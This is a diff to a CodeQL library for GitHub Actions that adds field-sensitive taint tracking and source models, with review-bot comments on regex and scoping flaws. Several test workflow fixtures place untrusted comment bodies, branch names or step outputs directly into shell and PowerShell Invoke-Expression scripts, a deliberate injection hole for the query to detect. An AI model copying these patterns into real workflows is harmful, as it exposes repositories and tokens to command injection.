@@ -126,40 +126,14 @@ private class EventSource extends RemoteFlowSource { } /** - * MaD sources - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - output arg: To node (prefixed with either `env.` or `output.`) - * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + * A Source of untrusted data defined in a MaD specification */ private class ExternallyDefinedSource extends RemoteFlowSource { - string soutceType; - - ExternallyDefinedSource() { - exists( - UsesExpr uses, string action, string version, string output, string trigger, string kind - | - sourceModel(action, version, output, trigger, kind) and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if output.trim().matches("env.%") - then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) - else - // 'output.' is the default qualifier - // TODO: Taint just the specified output - this.asExpr() = uses - ) and - soutceType = kind - ) - } + string sourceType; + + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } - override string getSourceType() { result = soutceType } + override string getSourceType() { result = sourceType } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 750a4011320e..9def461900eb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -21,42 +21,11 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * MaD summaries - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - input arg: From node (prefixed with either `env.` or `input.`) - * - output arg: To node (prefixed with either `env.` or `output.`) - * - kind: Either 'Taint' or 'Value' - */ -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr uses, string action, string version, string input | - // `output` not used yet - summaryModel(action, version, input, _, "taint") and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) - else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) - ) and - succ.asExpr() = uses - ) -} - -private class ExternallyDefinedSummary extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - externallyDefinedSummary(pred, succ) - } -} - +// private class RunEnvToScriptStep extends AdditionalTaintStep { +// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { +// runEnvToScriptstep(pred, succ) +// } +// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. 
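Review bot: The hunk leaves `RunEnvToScriptStep` behind as a commented-out class rather than deleting it, and its body `runEnvToScriptstep(pred, succ)` no longer matches the predicate's new three-argument signature, so the block cannot simply be un-commented later. Since the step is now wired in through `storeStep` in DataFlowPrivate.qll, delete the four commented lines (git keeps the history), or if a plain taint step is still intended keep a real class calling `runEnvToScriptstep(pred, succ, _)`. The `AdditionalTaintStep` class that precedes it starts before the hunk.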
@@ -68,23 +37,21 @@ private class ExternallyDefinedSummary extends AdditionalTaintStep { * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') * echo "Cleaned Initial URL: $INITIAL_URL" * echo "::set-output name=initial_url::$INITIAL_URL" + * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT + * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - runEnvToScriptstep(pred, succ) - } -} - -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { - exists(RunExpr r, string varName | +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(RunExpr r, string varName, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and ( - line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") + output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or + output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and + // TODO: repalce script with line below script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 79bd48b395a7..55fda0387894 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
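Review bot: The new output-name capture `".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*"` only recognises `echo "name=…"` with a double-quoted argument and a literal `$GITHUB_OUTPUT`, so `echo name=$X >> $GITHUB_OUTPUT`, `echo "name=$X" >> "${GITHUB_OUTPUT}"`, `printf` and the multi-line `name<<EOF` form all go unmodelled, which for an injection query means missed flows rather than noise. The greedy `(.*)=` also captures up to the last `=` on the line, so `echo "url=https://h/p?a=b" >> $GITHUB_OUTPUT` yields the field `url=https://h/p?a` and the store never meets its read. A tighter first step is `output = line.regexpCapture(".*echo\\s+\"?([^\"=\\s]+)=.*>>\\s*\"?\\$\\{?GITHUB_OUTPUT\\}?.*", 1)`, and the `set-output` branch should likewise use `name=([^:\\s]+)::`. The TODO about matching on `line` rather than `script` is fair, but I would fix the typo `repalce` while touching it.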
@@ -4,6 +4,8 @@ private import codeql.actions.Cfg as Cfg private import codeql.Locations private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.FlowSteps cached newtype TNode = TExprNode(DataFlowExpr e) 
@@ -129,25 +131,43 @@ predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } -private newtype TContent = TNoContent() { none() } +newtype TContent = + TFieldContent(string name) { + name = any(StepsCtxAccessExpr a).getFieldName() or + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() + } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ class Content extends TContent { - /** Gets a textual representation of this element. */ - string toString() { none() } -} + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } -predicate forceHighPrecision(Content c) { none() } + /** Gets a textual representation of this element. */ + abstract string toString(); -newtype TContentSet = TNoContentSet() { none() } + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} -private newtype TContentApprox = TNoContentApprox() { none() } +predicate forceHighPrecision(Content c) { c instanceof FieldContent } -class ContentApprox extends TContentApprox { - /** Gets a textual representation of this element. 
*/ - string toString() { none() } -} +class ContentApprox = ContentSet; -ContentApprox getContentApprox(Content c) { none() } +ContentApprox getContentApprox(Content c) { result = c } /** * Made a string to match the ArgumentPosition type. @@ -169,11 +189,15 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = /** * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * But only for those cases where the step output is defined externally in a MaD specification. + * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access + * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. * e.g. ${{ steps.step1.output.foo }} */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepOutputAccessExpr astTo | - (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -182,13 +206,14 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { /** * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} */ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, JobOutputAccessExpr astTo | + exists(Expression astFrom, CtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getRefExpr() = astFrom and + (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) ) } 
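Review bot: `jobsCtxLocalStep` now accepts any `NeedsCtxAccessExpr`, and for a job that calls a reusable workflow `getRefExpr()` resolves to the job's `uses` expression for every field name, so this adds a content-free local step from the reusable-workflow call to each `needs.<job>.outputs.<x>` access regardless of `<x>`. That bypasses the field-sensitive `reusableWorkflowReturnReadStep` introduced in this same commit and makes every declared output of the callee appear tainted as soon as one of them is, which is exactly the false positive the field flow is meant to remove (assuming the callee's return reaches the `uses` node with its field content, as the store/read steps suggest). Restrict the local step to plain jobs: `(astTo instanceof NeedsCtxAccessExpr and not astTo.(NeedsCtxAccessExpr).usesReusableWorkflow() or astTo instanceof JobsCtxAccessExpr)`. `stepsCtxLocalStep` in the hunk just above already applies the analogous restriction by requiring an externally defined source.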
@@ -197,7 +222,7 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, InputAccessExpr astTo | + exists(Expression astFrom, InputsCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -209,10 +234,13 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvAccessExpr astTo | + exists(Expression astFrom, EnvCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + ( + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + astTo.getRefExpr() = astFrom + ) ) } 
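Review bot: The new first disjunct in `envCtxLocalStep`, `externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName())`, relates the `env` value of a modelled `uses` step to every `${{ env.<name> }}` access with that name, with no requirement that the access be in the same step, job or even file, because in that branch `astFrom` is otherwise unconstrained. With common names such as `env.VERSION` or `env.GITHUB_TOKEN` this will connect unrelated workflows across the database and report flows that cannot exist at runtime. At minimum add `astTo.getLocation().getFile() = astFrom.getLocation().getFile()` inside the `exists`, and ideally tie the access to the step or job whose `env:` block declares the variable. The second disjunct's `getRefExpr()` is unscoped as well, but that is pre-existing.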
@@ -244,19 +272,63 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * A read step to read the value of a ReusableWork uses step and connect it to its + * corresponding JobOutputAccessExpr + */ +predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { + exists(NeedsCtxAccessExpr expr, string fieldName | + expr.usesReusableWorkflow() and + expr.getRefExpr() = node1.asExpr() and + expr.getFieldName() = fieldName and + expr = node2.asExpr() and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} + /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { none() } +predicate readStep(Node node1, ContentSet c, Node node2) { + // TODO: Extract to its own predicate + exists(StepsCtxAccessExpr access | + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access + ) + or + reusableWorkflowReturnReadStep(node1, node2, c) +} + +/** + * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * with a given access path (fieldName) + */ +predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { + exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | + out = stmt.getOutputsStmt() and + node1.asExpr() = out.getOutputExpr(fieldName) and + node2.asExpr() = out and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} /** * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. 
*/ -predicate storeStep(Node node1, ContentSet c, Node node2) { none() } +predicate storeStep(Node node1, ContentSet c, Node node2) { + reusableWorkflowReturnStoreStep(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + externallyDefinedSummary(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + runEnvToScriptstep(node1, node2, c) +} /** * Holds if values stored inside content `c` are cleared at node `n`. For example, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 0204015ac22a..52101c7e5a77 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -83,18 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputExpr output; + private OutputsStmt outputs; ReturnNode() { - this.asExpr() = output and - output = any(OutputsStmt s).getOutputExpr(_) + this.asExpr() = outputs and + outputs = any(ReusableWorkflowStmt s).getOutputsStmt() } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "output " + output.toString() } + override string toString() { result = "output " + outputs.toString() } - override Location getLocation() { result = output.getLocation() } + override Location getLocation() { result = outputs.getLocation() } } /** Gets the node corresponding to `e`. */ 
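Review bot: `ReturnNode` is narrowed from any `OutputsStmt` output expression to `any(ReusableWorkflowStmt s).getOutputsStmt()`, and the matching `reusableWorkflowReturnStoreStep` in DataFlowPrivate.qll is likewise limited to `ReusableWorkflowStmt`, so the `outputs:` of a composite action (`CompositeActionStmt`, whose inputs this commit still resolves in `InputsCtxAccessExpr.getRefExpr()`) no longer yield a return node at all. If composite actions previously returned taint through their outputs this is a silent loss of coverage; if they never did, a comment on `ReturnNode` such as `/** The outputs block of a reusable workflow; composite-action outputs are not modelled as returns yet. */` would spare the next reader the same question. Either way the asymmetry between composite-action inputs (modelled) and outputs (not) deserves a TODO here.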
@@ -106,13 +106,38 @@ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } * The set may be interpreted differently depending on whether it is * stored into (`getAStoreContent`) or read from (`getAReadContent`). */ -class ContentSet extends TContentSet { - /** Gets a textual representation of this element. */ - string toString() { none() } - +class ContentSet instanceof Content { /** Gets a content that may be stored into when storing into this set. */ - Content getAStoreContent() { none() } + Content getAStoreContent() { result = this } /** Gets a content that may be read from when reading from this set. */ - Content getAReadContent() { none() } + Content getAReadContent() { result = this } + + /** Gets a textual representation of this content set. */ + string toString() { result = super.toString() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + super.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } +} + +/** A field of an object, for example an instance variable. */ +class FieldContent extends Content, TFieldContent { + private string name; + + FieldContent() { this = TFieldContent(name) } + + /** Gets the name of the field. */ + string getName() { result = name } + + override string toString() { result = name } } diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml index a3f687a0611c..3cd0871c8831 100644 --- a/ql/lib/ext/tj-actions-changed-files.model.yml +++ b/ql/lib/ext/tj-actions-changed-files.model.yml 
@@ -3,26 +3,26 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", 
"*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.added_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.changed_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.copied_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.type_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", 
"output.unknown_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.unmerged_files", "*", "PR changed files" ] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 6860f091d5e6..4b47a154a1d8 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or - sinkNode(this, "expression-injection") + externallyDefinedSink(this, "expression-injection") } } @@ -37,5 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + " }}, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml deleted file mode 100644 index 11a101cef491..000000000000 --- a/ql/src/test/.github/workflows/ci-cleanup.yml +++ /dev/null 
@@ -1,47 +0,0 @@ -run-name: Cleanup ${{ github.head_ref }} -on: - pull_request_target: - types: labeled - paths: - - "images/**" - -jobs: - clean_ci: - name: Clean CI runs - runs-on: ubuntu-latest - permissions: - actions: write - steps: - - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - shell: pwsh - run: | - $startDate = Get-Date -UFormat %s - $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") - while ($true) { - $continue = $false - foreach ($wf in $workflows) { - $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" - $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } - $skippedIds | ForEach-Object { - $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" - Invoke-Expression -Command $deleteCommand - } - $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" - $pending = Invoke-Expression -Command $pendingCommand - if ($pending -gt 0) { - Write-Host "Pending for ${wf}.yml: $pending run(s)" - $continue = $true - } - } - if ($continue -eq $false) { - Write-Host "All done, exiting" - break - } - $curDate = Get-Date -UFormat %s - if (($curDate - $startDate) -gt 60) { - Write-Host "Reached timeout, exiting" - break - } - Write-Host "Waiting 5 seconds..." - Start-Sleep -Seconds 5 diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 6239f0490d13..9ebb7bbf2bea 100644 --- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml 
@@ -14,35 +14,39 @@ jobs: - name: Extract and Clean Initial URL id: extract-url + env: + BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') echo "Cleaned Initial URL: $INITIAL_URL" echo "::set-output name=initial_url::$INITIAL_URL" - name: Get Redirected URL with Debugging id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") echo "Curl Command Executed" echo "Redirected URL: $REDIRECTED_URL" echo "::set-output name=redirected_url::$REDIRECTED_URL" - name: Trim URL after PNG id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') echo "Trimmed URL: $TRIMMED_URL" echo "::set-output name=trimmed_url::$TRIMMED_URL" - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | - COMMENT_URL="${{ github.event.comment.url }}" NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') 
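Review bot: The `NEW_COMMENT_BODY=...` line still interpolates `${{ steps.trim-url.outputs.trimmed_url }}` directly into the shell script, while every other expression in this hunk was moved into `env:` variables. Since this file lives under `ql/src/test`, that is presumably the one sink the fixture is meant to keep; a short YAML comment above the line, such as `# intentionally left inline: the fixture's remaining expression-injection sink`, would stop a later reader from "fixing" it and silently changing what the test exercises. The `Update Comment with New URL` step continues in the next hunk.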
@@ -51,5 +55,3 @@ jobs: -H "Accept: application/vnd.github.v3+json" \ "${COMMENT_URL}" \ -d "$PAYLOAD" - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml deleted file mode 100644 index 01d332492519..000000000000 --- a/ql/src/test/.github/workflows/image_link_generator_2.yml +++ /dev/null 
@@ -1,61 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: extract-url - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: curl - env: - INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} - run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") - echo "Curl Command Executed" - echo "Redirected URL: $REDIRECTED_URL" - echo "::set-output name=redirected_url::$REDIRECTED_URL" - - - name: Trim URL after PNG - id: trim-url - env: - REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} - run: | - TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') - echo "Trimmed URL: $TRIMMED_URL" - echo "::set-output name=trimmed_url::$TRIMMED_URL" - - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - - name: Update Comment with New URL - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - COMMENT_URL: ${{ github.event.comment.url }} - ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} - run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" - - PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') - curl -X PATCH \ - -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ - -H "Accept: application/vnd.github.v3+json" \ - "${COMMENT_URL}" \ - -d "$PAYLOAD" 
diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml deleted file mode 100644 index 70aece4f7cff..000000000000 --- a/ql/src/test/.github/workflows/image_link_generator_3.yml +++ /dev/null @@ -1,27 +0,0 @@ -name: Image URL Processing - -on: - issue_comment: - types: [created] - -jobs: - process-image-url: - runs-on: ubuntu-latest - if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') - steps: - - name: Checkout - uses: actions/checkout@v2 - - - name: Extract and Clean Initial URL - id: source - env: - BODY: ${{ github.event.comment.body }} - run: | - INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') - echo "Cleaned Initial URL: $INITIAL_URL" - echo "::set-output name=initial_url::$INITIAL_URL" - - - name: Get Redirected URL with Debugging - id: sink - run: | - echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/.github/workflows/inter1.yml b/ql/src/test/.github/workflows/inter-job.yml similarity index 100% rename from ql/src/test/.github/workflows/inter1.yml rename to ql/src/test/.github/workflows/inter-job.yml diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/src/test/.github/workflows/simple1.yml index f61e763f1881..94e8be89bdc6 100644 --- a/ql/src/test/.github/workflows/simple1.yml +++ b/ql/src/test/.github/workflows/simple1.yml @@ -5,12 +5,15 @@ jobs: runs-on: ubuntu-latest steps: - - id: source + - id: summary uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ github.event.head_commit.message }} find: 'foo' replace: '' - - id: sink + - id: flow run: | - echo "${{steps.source.outputs.value}}" + echo 